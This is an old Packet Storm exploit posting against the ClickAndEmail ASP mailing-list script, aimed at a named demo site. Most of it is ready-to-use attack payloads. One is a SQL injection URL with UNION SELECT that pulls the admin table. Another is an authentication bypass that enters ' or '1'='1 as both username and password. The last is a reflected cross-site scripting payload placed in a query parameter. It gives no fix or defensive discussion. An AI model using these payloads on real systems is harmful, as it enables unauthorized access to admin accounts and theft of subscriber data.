ClickAndEmail SQL Injection / XSS

2008-12-16T00:00:00
ID PACKETSTORM:73029
Type packetstorm
Reporter AlpHaNiX
Modified 2008-12-16T00:00:00

Description

                                        
                                            `###########################################################################  
#-------------------------------AlpHaNiX----------------------------------#  
###########################################################################  
  
#Found By : AlpHaNiX  
#website : www.offensivetrack.org  
#contact : AlpHa[AT]HACKER[DOT]BZ  
  
###########################################################################  
  
#script : ClickAndEmaiL  
#download : null  
#Demo : http://icash.ch/ClickAndEmailDEMO  
  
###########################################################################  
  
#Exploits :  
  
--=[SQL INJECTION]=--  
http://icash.ch/ClickAndEmailDEMO/admin_dblayers.asp?action=update&tablename=Subscribers&redir=admin_subscribers.asp&ID=0+union+select+1,2,3,4,5,6,7+from+admin  
  
  
##########################################################################  
  
--=[AUTH BYPASS]=--  
  
http://icash.ch/ClickAndEmailDEMO/admin_main.asp  
  
USERNAME : ' or '1'='1  
PASSWORD : ' or '1'='1  
  
  
##########################################################################  
  
--=[Cross Site Scripting]=--  
  
http://icash.ch/ClickAndEmailDEMO/admin_dblayers.asp?action=update&tablename=%22%3E%3Cscript%3Ealert(1);%3C/script%3E  
  
  
  
#Greetz For My Best Friend ZIGMA  
  
###########################################################################  
  
  
`